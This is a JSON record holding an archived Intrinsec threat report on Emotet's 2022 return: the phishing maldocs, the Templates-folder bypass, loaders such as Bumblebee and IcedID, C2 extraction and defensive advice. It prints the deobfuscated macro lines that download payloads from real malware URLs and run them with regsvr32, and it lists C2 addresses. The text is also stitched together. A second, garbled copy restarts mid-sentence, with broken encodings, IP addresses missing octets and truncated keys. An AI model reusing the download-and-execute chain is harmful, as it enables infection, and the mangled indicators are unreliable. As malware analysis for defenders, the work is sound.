{
	"id": "8417325f-65a9-490b-bf66-b97904fb404e",
	"created_at": "2026-04-06T00:14:37.344947Z",
	"updated_at": "2026-04-10T13:12:48.108731Z",
	"deleted_at": null,
	"sha1_hash": "4e8c55fd789a464429527d10f07ce9ba0b291aa9",
	"title": "Emotet returns and deploys loaders",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 199357,
	"plain_text": "Emotet returns and deploys loaders\r\nBy Intrinsec\r\nPublished: 2023-01-09 · Archived: 2026-04-05 20:33:47 UTC\r\nFirst identified in 2014 (as the Geodo banking Trojan) and considered by the U.S. Department of Homeland Security (DHS) to be one of the “most costly and destructive malwares” in the world, Emotet appears to be back after four months of inactivity.\r\nIndeed, the spam campaigns had come to an abrupt halt on July 13th, 2022, after being responsible for the compromise of more than one million computers worldwide. However, the lull seems to have come to an end, as cybersecurity researcher Tommy Madjar (@ffforward, a member of Cryptolaemus) identified a return of Emotet-related operations on the morning of November 2nd, 2022. Contacted by BleepingComputer, the CTI researcher at Proofpoint added that phishing campaigns spreading Emotet were back, using the same email thread hijacking technique to lure users and spread maldocs. Intrinsec was able to independently confirm the resurgence of Emotet from its probes.\r\nAs a reminder, Emotet was originally designed as a banking Trojan before evolving into a modular Trojan, being the fourth iteration of the Geodo malicious code. Since 2017, however, Emotet has no longer been used as a Trojan but as a loader-as-a-service (LaaS) for the purpose of distributing malicious code within the information systems (IS) it infects. 
According to Trend Micro, Emotet’s business is tied to Russian-speaking actors and likely resides somewhere in the UTC+10 time zone or further east, based on C\u0026C delivery activities. Since then, along with peaks of activity, Emotet has become an important initial access broker that enables top-tier ransomware gangs.\r\nIn the recent past, Emotet was known to install the TrickBot malware or, more recently, Cobalt Strike. The Emotet malware was also known to be used by Conti operators, as well as by BlackCat and Quantum operators after Conti operations “ended” in June 2022. Microsoft also recently reported that developers of Emotet (but also of IcedID and Qakbot) have been recruited by the DEV-0193 cluster (Trickbot).\r\nAs far as the new Emotet distribution campaign is concerned, it appears to have relatively few new features at the time of writing, keeping a distribution pattern similar to previously observed ones by leveraging the EtterSilent maldoc builder. In France, stolen emails linked to notary offices have been observed in this new campaign, while similar emails appeared in a previous campaign in October 2020.\r\nOf note, though, is the new social engineering technique introduced by a new Excel attachment containing instructions to bypass Microsoft’s “Mark-of-the-Web” (MoTW) mechanism. This Excel file contains instructions to coerce the user into copying the maldoc to a trusted folder named “Templates”, allowing it to bypass Microsoft’s Protected View. Once the file is moved to this folder and opened, it immediately executes the macros that trigger the loading of the Emotet malware.\r\nWe also explain in the main text that since its return, Emotet has been seen dropping the IcedID and Bumblebee malwares. We anticipate that further variants and techniques will surface in the future with such volumes of spam seeking ultimately to deploy ransomware. 
As far as other types of threats are concerned, a recent report from Proofpoint showed that Emotet is delivering a new module that executes XMRig (the most common Monero miner).\r\nThe present report also provides several tips to analyze the whole attack chain leveraged by Emotet as well as some recommendations to defend against it.\r\nIntrinsec CTI services\r\nOrganizations are facing a rise in the sophistication of threat actors and of the intrusion sets used by malicious actors. Emotet, described as “one of the world’s most destructive malwares” by the U.S. Department of Homeland Security, is regularly seen in new attack campaigns, overcoming security tools developed by vendors.\r\nhttps://www.intrinsec.com/emotet-returns-and-deploys-loaders/\r\nPage 1 of 24\r\nTo address these evolving threats, it is now necessary (but not sufficient) to take a proactive approach to the detection and analysis of any element deemed malicious, in order to allow companies to anticipate, or at least react as quickly as possible to, the attempted compromises they face.\r\nFor this report, shared with our clients in November 2022, Intrinsec relied on its Cyber Threat Intelligence service, which provides its customers with high value-added, contextualized and actionable content to understand and contain cyber threats.\r\nTo go further, Intrinsec offers you, through its “Risk Anticipation” module, dedicated and actionable intelligence to feed your security tools. 
For more information, go to htbqccsz.elementor.cloud/veille-cybersecurite/\r\nEmotet’s aliases\r\nEmotet malware is also encountered in the literature as:\r\nHeodo (being the 4th malicious iteration of Geodo)\r\nSpmTools by AdvIntel\r\nThe source code of Emotet and its infrastructure is allegedly operated by an intrusion set dubbed:\r\nTA542 by Proofpoint\r\nMummy Spider by CrowdStrike\r\nGoldCrestwood by Secureworks\r\nMealybug by Symantec\r\nRecent Emotet delivery tactics, techniques, and procedures\r\nOur analysis starts with the first stage of the attack chain, which uses a phishing email, more specifically a spear phishing attachment technique [T1566.001]. For this, we found and analyzed an email sent by Emotet during a recent spam campaign that contains a malicious document (maldoc) attached to the email (see an example in Figure 1).\r\nFigure 1 An example of emails which may lead to Emotet malware infection. As extensively seen in past Emotet TTPs, the latter fakes replies based on legitimate emails stolen from mail clients of previously infected Windows hosts. The EML file with sha256 910731579a78d2da6452bede7dfce8e1f89c285c22d8a7d40db2eafc2fcc45af was retrieved from VirusTotal.\r\nOnce the lured user opens the XLS file, a message box informs them that the document needs to be copied to a specific directory path to display the contents of the file (see Figure 2).\r\nEmotet spreaders are now using a new social engineering technique to coerce the user into copying the Excel file into the Microsoft Office Templates folder before relaunching it. 
This is achieved via a fake yellow graphical ribbon pretending to be an official Microsoft warning. Because the Templates folder is considered a trusted location according to Microsoft Office policy, the malicious macro will run immediately without a security warning (see the recommendation to preempt the threat at this stage). If you don’t copy the file anywhere, it will still execute the macros as soon as you press Enable Content in the yellow security warning from Excel (not the fake one in the spreadsheet).\r\nFigure 2 Message box displayed when opening the malicious document. As shown above, Microsoft informs the user through the functionality known as Mark of the Web (MoTW), forcing Emotet spreaders to adapt. The latter therefore added a specific message to the file, mimicking the Excel security warning (the yellow horizontal bar above the content) and indicating that, to run the file, it must be placed in the whitelisted Office Templates folder.\r\nIt is striking that Emotet so far has not migrated away from Office macros to other delivery mechanisms like ISO and LNK files. Indeed, many malware families quickly adopted this workaround following Microsoft’s recent announcement that it would begin disabling macros by default in Office documents downloaded from the internet.\r\nOne or several sheets (up to six), with apparently blank cells and password protection, are usually seen at the bottom of the document, as depicted in Figure 3. We expect that this technique could slightly change in the future to evade heuristic signatures.\r\nFigure 3 Excel maldoc with sheet protection added. 
If only one sheet is apparent in some encountered files, hidden sheets can be revealed with a right-click option to pursue the analysis.\r\nThe Emotet spreaders relied on sheet protection so that the user cannot view the included macro formula. However, Office sheet password protection can be broken via a well-known brute force technique in a reasonable amount of time, or via a specific patching procedure. We retrieved the password using the first technique to reveal the cell contents and the macro content.\r\nThe password to unprotect the sheets and reveal their content is: AABABAAABBB^\r\nAnother trick to avoid analysis was to scatter the data across cells and blank it out by changing the font color, as shown in Figure 4, so that the XLM macro is not directly readable.\r\nFigure 4 The malicious macro was scattered across the maldoc and hidden thanks to a white font color. Characters can be unveiled by changing the color of the cells.\r\nUsing olevba, a free Python tool, it is possible to find the cell containing the general formula concatenating the whole command executed when the Excel file is opened (see the output below).\r\nSHEET: Sheet6, Macrosheet\r\nCELL:G13, =\r\n(((((((FORMULA((((((((((((('Sheet1'!L24\u0026'Sheet1'!L26)\u0026'Sheet1'!L27)\u0026'Sheet1'!L28)\u0026'Sheet1'!L28)\u0026'Sheet2'!F6)\u0026'Sheet2'!N19)\u0026'Sheet1'!F10\r\n0\r\nAnother trick to slow down the analysis was to shrink column G in Sheet6, as shown in Figure 5.\r\nIn the present case, a field called “Auto_Open07457358934307593258350725798323209” was also observed. 
The latter automatically triggers the aforementioned formula, visible in cell G13, when the workbook is opened (see this reference for details on this old technique).\r\nFigure 5 shows 4 pairs of commands containing de-obfuscated hard-coded URLs which serve for the second stage of the attack:\r\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCBB\",0,\"https[:]//cs.com.sg/Backup/Bk778kXNKMiH5vH/\"\r\n=EXEC(\"C:\\Windows\\System32\\regsvr32.exe /S ..\\oxnv1.ooccxx\")\r\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCBB\",0,\"https[:]//j2ccamionmagasin.fr/css/1Mp8y/\",\"..\\ox\r\n=EXEC(\"C:\\Windows\\System32\\regsvr32.exe /S ..\\oxnv2.ooccxx\")\r\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCBB\",0,\"http[:]//atici.net/old/PkZI74DD/\",\"..\\oxnv3.ooccx\r\n=EXEC(\"C:\\Windows\\System32\\regsvr32.exe /S ..\\oxnv3.ooccxx\")\r\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCBB\",0,\"http[:]//clanbaker.org/css/khhl7kT2n69n/\",\"..\\ox\r\n=EXEC(\"C:\\Windows\\System32\\regsvr32.exe /S ..\\oxnv4.ooccxx\")\r\nIn the present case, a CALL function is used to download files from the URLs and save them to disk via the URLDownloadToFileA function. It is followed by an EXEC function that executes each downloaded file via the living-off-the-land binary (LOLBin) regsvr32.exe.\r\nFour DLLs were then downloaded from those URLs. 
Three of these DLLs were copied to %UserProfile%\\AppData\\Local with random names, in a dedicated folder also having a random name, probably to bypass detection:\r\nC:\\Users\\admin\\AppData\\Local\\ClVoCQrGkecuASUzF.dll\r\nC:\\Users\\admin\\AppData\\Local\\WLifsjKOOFEUaGZqSKWcHGU.dll\r\nC:\\Users\\admin\\AppData\\Local\\WBoDkXTZxEMvgSGkaWpRogE.dll\r\nThe LOLBin regsvr32.exe is then used to execute those 4 downloaded DLLs:\r\nFigure 6 The LOLBin regsvr32.exe is used to execute the previously downloaded DLLs.\r\nregsvr32.exe will then communicate with a Korean IP address (182.162.143[.]56):\r\nFigure 7 Network communications showing direct requests to one of Emotet’s C2s.\r\nThis IP address belongs to the list of C2s extracted from the present sample.\r\nAs far as the persistence mechanism is concerned, access is maintained on the system by adding multiple keys to the Windows registry, which will execute the DLLs at every restart with regsvr32.exe:\r\nFigure 8 Location paths of the DLLs are saved in the Windows registry for persistence purposes.\r\nEach key will start regsvr32.exe at system startup to execute the DLLs:\r\nFigure 9 Commands that will launch the DLLs at computer startup.\r\nAll described techniques (hidden sheets, password protection, white background and characters) and the observed attack chain suggest that this campaign could be attributed to Emotet’s Epoch5 botnet, which leverages the SilentBuilder dropper.\r\nEtterSilent Maldoc builder distribution\r\nAfter having analysed several samples, we concluded from observed commonalities within the maldocs’ metadata (see the Actionable content section) that the EtterSilent maldoc builder was leveraged for Emotet’s distribution.\r\nEtterSilent was created by a threat actor known as AshkERE on Russian-speaking underground cybercriminal forums (Exploit and XSS). 
This threat actor appears to be the sole seller and developer of EtterSilent (even though teamwork remains possible). As a reminder, EtterSilent is a malicious document generator with embedded defence evasion techniques, offering two types of weaponized Microsoft Office documents (maldocs). The most popular version seems to be the one leveraging macros, which serves many other threats such as Gozi, IcedID, Trickbot, BazarLoader and Qbot.\r\nEtterSilent came into favour with the cybercriminal community in 2021. Although its first mention dates back to 2020, the term was really popularized on Exploit and XSS during the spring of 2021. EtterSilent was already considered at that time to be a very efficient maldoc builder with low detection rates from security tools.\r\nFigure 10 AshkERE detailing his social network contacts in order to avoid impersonation, while confirming his presence on XSS.\r\nThe economic model seems (or seemed) to be built around a subscription offer that members could purchase (apparently limited to five people simultaneously). The threat actor also sold the ‘EtterSilent Encrypt Edition’ builder so that intrusion sets could operate the tool themselves, offering unlimited use of the tool for an initial price of 3000 dollars, lowered to 2500 dollars at the end of the operations (on November 30, 2021).\r\nAshkERE is still present today with a similar username on Exploit and XSS and remains an active user even after having closed the EtterSilent sales thread. 
He no longer appears to be publicly selling EtterSilent, though possibly privately.\r\nLinks with other malwares?\r\nIt is worth noting that a similar Excel document, analyzed in this report and used to spread Emotet, was also observed delivering additional malwares such as Bumblebee and IcedID, two major players in the current threat landscape.\r\nWhile analyzing the network traffic of such a payload during dynamic malware analysis, a communicating IP address drew our attention. We indeed noticed the previously seen Emotet C2 (182.162.143[.]56), as shown in Figure 11:\r\nFigure 11 Excel document with sha256 199a2e0e1bb46a5dd8eb3a58aa55de157f6005c65b70245e71cecec4905cc2c0 communicating with Emotet’s C2.\r\nThe Bumblebee infection started with a downloaded PowerShell script (‘tps1.ps1’) used to download an additional DLL (‘bb.dll’) associated with the malware:\r\nFigure 12 GET request for the ps1 file that will later download the Bumblebee DLL.\r\nThe extracted config from this Bumblebee DLL reveals the following information about the malware:\r\nBotnet ID: 0311t2\r\nList of C2:\r\n39.65.8[.]170:443\r\n103.144.139[.]156:443\r\n107.189.30[.]231:443\r\n91.245.254[.]101:443\r\n194.135.33[.]127:443\r\nBumblebee’s configuration is contained inside the .data section of the binary amongst the RC4-encrypted strings. 
The RC4 decryption key is hard-coded in this section in plain text.\r\nWe then observe that once Bumblebee is executed, the infected machine communicates with a C2 (103.144.139[.]156) that was present in the list extracted from the configuration.\r\nFigure 13 Network traffic showing a connection to one of Bumblebee’s C2s.\r\nWe can also observe connections to an IP address (87.251.67[.]168) associated with the IcedID malware:\r\nFigure 14 Network traffic showing a connection to one of IcedID’s C2s.\r\nThis address resolves to the domain spkdeutshnewsupp[.]com (see Figure 15), from which we could pivot and gather additional hashes of IcedID samples (Figure 16).\r\nFigure 15 Packet containing the domain name.\r\nFigure 16 Detection rate (6/95) of this IP address on VirusTotal Intelligence. Several malicious payloads associated with IcedID communicate with this domain.\r\nFrom a pivot on VirusTotal Intelligence we could gather additional hashes of IcedID samples that communicate with this domain.\r\nAs far as other types of threats are concerned, a recent report from Proofpoint showed that Emotet is delivering a new module that executes XMRig (the most common Monero miner). 
Consequently, detecting Emotet often means that the attack is more extensive than expected; conversely, the detection of coin miners or loaders should not be overlooked.\r\nCode Analysis of a recent Emotet sample\r\nTo better understand Emotet’s recent evolutions and new features, we performed a code analysis of a recent sample of this malware (sha256 of the analyzed sample: 06b3d3c50da5054b9e37fb6c429c560484be457a09a900b21b5185cf10128ed4). First, we carried out a static analysis of the sample. The high entropy of the .text section of the binary, as depicted in Figure 17, suggests that this malware is probably packed. This is also suggested by the presence of randomized unreadable strings in the sample.\r\nFigure 17 The high entropy of the .text section of the binary, as viewed in the open-source tool Detect-It-Easy, suggests that it is probably packed.\r\nAt this stage of the analysis, the sample was loaded into the x64dbg debugger to unpack Emotet. For that purpose, a breakpoint was set on calls to some Windows APIs such as \"VirtualAlloc\" (allocating memory). Once this breakpoint is reached, it is possible to observe, on return from the VirtualAlloc function, that the malware allocates memory space and writes a binary (MZ header) at the address returned in the RAX register.\r\nFigure 18 Memory dump at the address held in the RAX register, containing the malicious Emotet PE file. Hash of the file (sha256): 04c40a669fcfcd20bd429cbe4f78c71e8403ca70f804262a24024cb40dba321b\r\nOnce the binary is unpacked, we obtain the final Emotet payload, which is a 64-bit DLL.\r\nFigure 19 Repeated mathematical operations used for obfuscation.\r\nFigure 20 Another example of those operations.\r\nAt first glance, the static analysis of the DLL seems particularly difficult because of the heavy code obfuscation used. 
Simple expressions were transformed into mathematical operations repeated multiple times. Sometimes the results of these operations are passed to a function that is never used in the program.\r\nIP addresses and ports of the C2 servers are obfuscated in functions, each of those functions corresponding to one specific C2. As we can see, instead of having those constants in the code, Emotet’s developers use a series of logical operations to build them. However, it is easy to bypass this obfuscation technique, since the decompiler automatically simplifies those constants in its pseudocode view. Therefore, the effort of Emotet’s developers to hinder analysis of the malware’s code appears completely moot.\r\nFigure 21 Disassembly view (left) and pseudocode view (right) of a function returning the C2 IP and port.\r\nThis function is referenced in a list of several other functions also containing the IP addresses and ports of other C2s.\r\nFigure 22 Pointers to every function containing C2 information. It is possible to find in this list the function previously analyzed.\r\nSince Emotet chose obfuscation over encryption to hide its C2 configuration, we could simply emulate those functions, or even run them in a debugger, to retrieve the IP/port information in plain text.\r\nAs far as Emotet 64-bit emulation is concerned, we used “Dumpulator” to emulate the function returning the C2’s information.\r\nFigure 23 Emulation result for the given function, returning in this example an IP address of 159.65.88[.]10 and a port of 8080.\r\nA further innovation of recent Emotet samples lies in the way it encrypts its network communications. Previously, Emotet used to hide its C2 HTTP network traffic via an AES symmetric key encrypted with a hard-coded RSA public key. Emotet now uses an Elliptic Curve Diffie-Hellman (ECDH) public key. 
Furthermore, Emotet uses a hard-coded Elliptic Curve Digital Signature Algorithm (ECDSA) public key for data validation. From the studied unpacked sample, we could retrieve the following information:\r\nECDH:\r\nMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE86M1tQ4uK/Q1Vs0KTCk+fPEQ3cuwTyCz+gIgzky2DB5Elr60DubJW5q9Tr2dj8/gEFs0TIIEJgLTuq\r\nECDSA:\r\nMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEQF90tsTY3Aw9HwZ6N9y5+be9XoovpqHyD6F5DRTl9THosAoePIs/e5AdJiYxhmV8Gq3Zw1ysSP\r\nInfrastructure\r\nAfter having extracted the configuration of different samples (see previous section), we managed to retrieve several IP addresses of command-and-control servers with which the payloads communicate. The configurations vary according to the samples and allow us to identify whether a payload is part of Epoch4 or Epoch5 according to its encryption key.\r\nWe cross-referenced these addresses with the command-and-control servers referenced on Feodo Tracker. Some were still active while others had been disconnected after being publicly reported. The configurations contained IP addresses associated with specific ports (TCP ports like 80 (http) or 443 (https), or different ports (8080, 7080, …)).\r\nAfter carefully analysing which services listening on such ports communicate with the payloads, we systematically found an nginx proxy server. This was deduced from the response headers returned by a simple GET request to fetch data.\r\nWhile trying to find a differentiating element on these servers, we noticed a certain similarity: most of those servers exposed legitimate web services next to the service used for command \u0026 control, on a different port. 
These commonalities are summarized in two Maltego graphs depicted in Figure 24 and Figure 25.\r\nFigure 24 Maltego graph of Emotet’s Epoch 4 C2 proxies with legitimate services impacted by vulnerabilities.\r\nFigure 25 Maltego graph of Emotet’s Epoch 5 C2 proxies with legitimate services and vulnerabilities.\r\nIn addition to exposing legitimate web services, all these servers have numerous vulnerabilities according to Shodan. We concluded, with a moderate level of confidence, that these servers have limited security and may have been compromised.\r\nConclusion\r\nThe present report provides a straightforward and up-to-date analysis of the ongoing Emotet campaign, presently distributing hundreds of thousands of emails per day. This investigation highlights notable changes in the modus operandi of Emotet’s operators (TA542), such as new ways to social engineer its victims into executing the malicious documents used to deploy Emotet. Beyond these new methods leveraged by Emotet for initial access, the present report suggests that the change in the obfuscation technique of the main payload does not hinder an easy extraction of the malware’s configuration. This shows that Emotet’s developers may not understand how modern decompilers actually work. We also showed that since its return, Emotet has been seen dropping the IcedID and Bumblebee malwares via Epoch 4 botnets. We anticipate that further variants and techniques will surface in the future with fewer or greater volumes of spam.\r\nThe present report also provides several tips to analyze the whole attack chain leveraged by Emotet as well as some recommendations to defend against it.\r\nActionable content\r\nAs we have seen in the main text, Emotet spreaders were forced to adapt and now try to lure users by getting them to copy the maldoc into a whitelisted directory path on the disk. 
We recommend monitoring any execution of XLS files arising from those directories. It is also recommended to make employees aware of this new technique via awareness training sessions and simulated phishing attacks.\r\nEmotet is known to be highly polymorphic (i.e., the code can change its identifiable features while maintaining its functionality) and tends to embed more and more threatening modules. Emotet often repacks its dropper and changes the modules it loads to stay ahead of signature-based detection solutions. Although its functionalities might not vary that much, these changes are enough to bypass pattern-matching and footprint detection. More subtle detection (EDR, behavioral analysis) would be required to detect the initial infection.\r\nWe draw your attention to one checker and complementary tools:\r\nA relevant free tool to defend against Emotet, dubbed EmoCheck, was released a while ago by JPCERT (available on their GitHub repository). This checker might be particularly relevant for forensics teams when they investigate workstations or servers that might have been infected by Emotet.\r\nEmoCheck-ReportChecker can also be helpful, as it generates statistics out of numerous EmoCheck reports.\r\nAnother relevant tool is named EmoKill. 
This program was inspired by the detection rules of EmoCheck and was compiled and shared on GitHub.\r\nTo draft this report, Intrinsec studied commonalities of XLS maldocs sent to Emotet’s victims as spearphishing attachments. One common metadata pattern that could be leveraged on VirusTotal Intelligence for hunting purposes is as follows:\r\nmagic:\"CDF V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, *Author: Gydar, Last Saved By: Gydar*, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jun 04 18:19:34 2015, Security: 0\"\r\nThe code page identifier 1251 refers to the Windows Cyrillic-Slavic encoding, mostly used by Russians, Bulgarians, Serbians and Macedonians. It is also worth noting that all results of the aforementioned query on VT have the same file size of 255 kB.\r\nSeveral SIGMA detection rules could be leveraged to detect an attack by the Emotet malware:\r\nDetects network connections and DNS queries initiated by Regsvr32.exe\r\nDetects various anomalies in relation to regsvr32.exe\r\nDetects New Lolbin Process by Office Applications\r\nA YARA detection rule provided by The DFIR Report\r\nTo detect all threats mentioned in this report (Emotet, IcedID, BumbleBee), defenders can also rely on relevant abuse.ch threat intel sources such as Feodo Tracker, ThreatFox and MalwareBazaar, as well as the soon-available Intrinsec IoCs feed.
It is followed by an EXEC function to execute each downloaded file via the living off the land binary (LOLBin)\r\nregsvr32.exe.\r\nFour DLLs were then downloaded from those URLs. Three of these DLLs were copied in %UserProfile%AppDataLocal\r\nwith random names in a dedicated folder also having a random name, probably to bypass detection:\r\nC:UsersadminAppDataLocalClVoCQrGkecuASUzF.dll\r\nC:UsersadminAppDataLocalWLifsjKOOFEUaGZqSKWcHGU.dll\r\nC:UsersadminAppDataLocalWBoDkXTZxEMvgSGkaWpRogE.dll\r\nThe LOLBin regsvr32.exe is then used to execute those 4 downloaded DLLs:\r\n%22%22\r\nFigure 6 The LOLBin regsvr32.exe is used to execute the previously downloaded DLLs.\r\nregsvr32.exe will then communicate with a Korean IP address (182.162.143.56):\r\n%22%22\r\nFigure 7 Networks communications showing direct requests to one of Emotet’s C2.\r\nThis IP address belongs to the list of C2s extracted from the present sample.\r\nAs far as the persistence mechanism is concerned, the access is maintained on the system by adding multiple keys to the\r\nWindows registry, which will execute the DLL at every restart with regsvr32.exe:\r\n%22%22\r\nFigure 8 Location path of the DLLs are saved in the Windows registry for persistence purposes.\r\nEach key will start regsvr32.exe at the system’s startup to execute the DLLs\r\n%22%22\r\nFigure 9 Commands that will launch the dll at the start of the computer.\r\nAll described techniques (hidden sheets, password protection, white background and characters) and observed attack chain\r\nsuggest that this campaign could be attributed to Emotet’s epoch5 botnet, which leverages the SilentBuilder dropper.\r\nEtterSilent Maldoc builder distribution\r\nAfter having analysed several samples, we concluded from observed commonalities within the maldocs’s metadata (see in\r\nthe Actionable content section) that EtterSilent maldoc builder was leveraged for Emotet’s distribution.\r\nEttersilent was created by a threat actor known as AshkERE on Russian 
speaking underground cybercriminal forums\r\n(Exploit and XSS). This threat actor appears as the sole seller and developer of EtterSilent (even though a teamwork remains\r\npossible). As a reminder, EtterSilent is a malicious document generator with embedded evasion defence techniques offering\r\nhttps://www.intrinsec.com/emotet-returns-and-deploys-loaders/\r\nPage 9 of 24\n\ntwo types of weaponized Microsoft Office documents (maldocs). The most popular version seems the one leveraging\r\nmacros, which is serving many other threats such as Gozi, IcedID, Trickbot, BazarLoader and Qbot.\r\nEtterSilent came into favour with the cybercriminal community in 2021. Although its first mention dates to 2020, the term\r\nwas really popularized on Exploit and XSS during the spring of 2021. EtterSilent was already considered at that time as a\r\nvery efficient maldoc builder with low detection rates from security tools.\r\n%22%22\r\nFigure 10 AshkERE detailing his social network contacts in order to avoid impersonation, while confirming his presence on\r\nXSS.\r\nThe economic model seems/seemed to be constituted around a subscription offer, which can be purchased by members\r\n(seems to only be possible for five people simultaneously). The threat actor also sold the ‘EtterSilent Encrypt Edition’\r\nbuilder so intrusion sets could operate the tool themselves, offering an unlimited use of the tool for an initial price of 3000\r\ndollars, lowered to 2500 dollars at the end of the operations (on November 30, 2021).\r\nAshkERE is still present today with a similar username on Exploit and XSS and remains an active user even after having\r\nclosed the EtterSilent sales thread. 
He no longer appears to be publicly selling EtterSilent, but possibly privately.\r\n“Links with other malwares?”\r\nIt is worth noting that a similar Excel document analyzed in this report and used to spread Emotet was also observed to\r\ndeliver additional malwares such as Bumblebee and IcedID, two major players in the current threat landscape.\r\nWhile analyzing the network traffic of such payload upon dynamic malware analysis, a communicating IP address drew our\r\nattention. We indeed noticed the previously seen Emotet C2 (182.162.143%91.%9356) as shown in Figure 11:\r\n%22%22\r\nFigure 11 Excel document with a sha256: 199a2e0e1bb46a5dd8eb3a58aa55de157f6005c65b70245e71cecec4905cc2c0\r\ncommunicating to Emotet’s C2.\r\nBumblebee infection started with a downloaded PowerShell script (‘tps1.ps1’) used to download an additional dll (‘bb.dll’)\r\nassociated with the malware:\r\n%22%22\r\nFigure 12 GET requesting the ps1 file that will later download the bumblebee dll.\r\nThe extracted config from this Bumblebee dll reveals the following information about the malware:\r\nBotnet ID: 0311t2\r\nList of C2:\r\n65.8%91.%93170:443\r\n144.139%91.%93156:443\r\n189.30%91.%93231:443\r\n245.254%91.%93101:443\r\n135.33%91.%93127:443\r\nBumblebee’s configuration is contained inside the .data section of the binary amongst the RC4 encrypted strings. 
The RC4\r\ndecryption key is hard coded in this section in plain text.\r\nWe then observe that once Bumblebee is executed, the infected machine communicates with a C2\r\n(103.144.139%91.%93156) that was discovered in the extracted list from the configuration.\r\n%22%22\r\nFigure 13 Network traffic showing a connection to one of Bumblebee’s C2s.\r\nWe can also observe connections to an IP address (87.251.67%91.%93168) associated with the IcedID malware:\r\n%22%22\r\nFigure 14 Network traffic showing a connection to one of IcedID’s C2.\r\nThis address resolves the domain spkdeutshnewsupp%91.%93com (see Figure 15) from which we could pivot and gather\r\nadditional hashes of IcedID samples (Figure 16).\r\n%22%22\r\nFigure 15 Packet containing the domain name.\r\nhttps://www.intrinsec.com/emotet-returns-and-deploys-loaders/\r\nPage 10 of 24\n\n%22%22\r\nFigure 16 Detection rate (6/95) of this IP address on VirusTotal Intelligence. Several malicious payloads associated with\r\nIcedID communicate with this domain.\r\nFrom a pivot on VirusTotal intelligence we could gather additional IcedID samples hashes that communicate with this\r\ndomain:\r\n05a3a84096bcdc2a5cf87d07ede96aff7fd5037679f9585fee9a227c0d9cbf51\r\n4e79b28215998b57d79a5272e9114eff8fc6ea3c7aac626110d18087c7d1a12b\r\n748c98bd8fe9eaf024481251faa10a0abc631b0fb03758271526d813b57b2567\r\n923715af8f2e49242e18210c143ffd69300cdf675f61ae33c2f2fcbab6df07e2\r\nc58b13dc51e572ec288d97aa255d55884d7418466b8381afd1a4278a0be87427\r\nd3d0e3512bf398aa0699fe1a57cd769fd0ef1801c110aea63c469f7632f36d50\r\nAs far as other types of threats are concerned, a recent report from Proofpoint showed that Emotet is delivering a new\r\nmodule that executes XMRig (the most common Monero miner). 
Consequently, detecting Emotet often means that the\r\nattack is more thorough than expected and conversely the detection of coinminers/loaders shall not be overlooked.\r\nCode Analysis of a recent Emotet sample\r\nTo better understand Emotet’s recent evolutions and new features, we proceeded to a code analysis of a recent sample of this\r\nmalware Hash of the analyzed sample (sha256:\r\n06b3d3c50da5054b9e37fb6c429c560484be457a09a900b21b5185cf10128ed4). First, we carried on a static analysis of such\r\na sample. The high entropy of the .text section of the binary, as depicted in Figure 17, suggests that this malware is probably\r\npacked. This is also suggested by the presence of randomized unreadable strings in the sample.\r\n%22%22\r\nFigure 17 High entropy of the text section of the binary suggests that it is probably packed as viewed in Detect-it-easy open-source tool.\r\nAt this stage of the analysis, the sample was loaded into the debugger x64dbg to unpack Emotet. For that purpose, a\r\nbreakpoint was set on calls to some Windows APIs such as %22VirtualAlloc%22 (allocating memory). Once this breakpoint\r\nis reached, it is possible to observe in the return of the VirtualAlloc function that the malware allocates memory space and\r\nwrote a binary (MZ) in the RAX register.\r\n%22%22\r\nFigure 18 Memory dump of the RAX register containing the malicious Emotet PE file. Hash of the file (sha256):\r\n04c40a669fcfcd20bd429cbe4f78c71e8403ca70f804262a24024cb40dba321b\r\nOnce the binary is unpacked, we obtain the final Emotet payload which is a 64bit dll.\r\n%22%22\r\nFigure 19 Disassembly view (left) and pseudocode view (right) of a function returning the C2 IP and port.\r\n%22%22\r\nFigure 20: Another example of those operations.\r\nAt first glance, the static analysis of the dll seems particularly difficult because of the heavy code obfuscation used. Simple\r\nexpressions were transformed into mathematical operations repeated multiple times. 
Sometimes the results of these\r\noperations are passed in a function that will never be used in the program.\r\nIP addresses and ports of the C2 servers are obfuscated in functions, each of those functions corresponding to one specific\r\nC2. As we can see, instead of having those constants in the code, Emotet’s developers are using a series of logical operations\r\nto build them. However, it is easy to bypass this obfuscation technique since the display of those constants has been\r\nautomatically simplified in pseudocode. Therefore, the effort of the developers of Emotet to hinder analysis of the malware’s\r\ncode appears completely moot.\r\n%22%22\r\nFigure 21 Disassembly view (left) and pseudocode view (right) of a function returning the C2 IP and port.\r\nThis function is referenced in a list of several other functions also containing the IP addresses and ports of other C2.\r\n%22%22\r\nhttps://www.intrinsec.com/emotet-returns-and-deploys-loaders/\r\nPage 11 of 24\n\nFigure 22 Pointers to every function containing C2 information. It is possible to find in this list the function previously\r\nanalyzed.\r\nSince Emotet chose obfuscation over encryption to hide its C2 configuration, we could simply emulate those functions, or\r\neven run them in a debugger to retrieve IP/port information in plain text.\r\nAs far as Emotet 64-bit emulation is concerned, we used “Dumpulator” to emulate the function returning the C2’s\r\ninformation.\r\n%22%22\r\nFigure 23 Emulation result for the given function returns in this example an IP address: 159.65.88%91.%9310 and a Port:\r\n8080\r\nA further innovation of recent Emotet samples lies in the way it encrypts its network communications. Previously, Emotet\r\nwas used to hide its C2 HTTP network traffic via an AES symmetric key encrypted by a hard-coded RSA public key.\r\nEmotet now uses (EDCH) public key. 
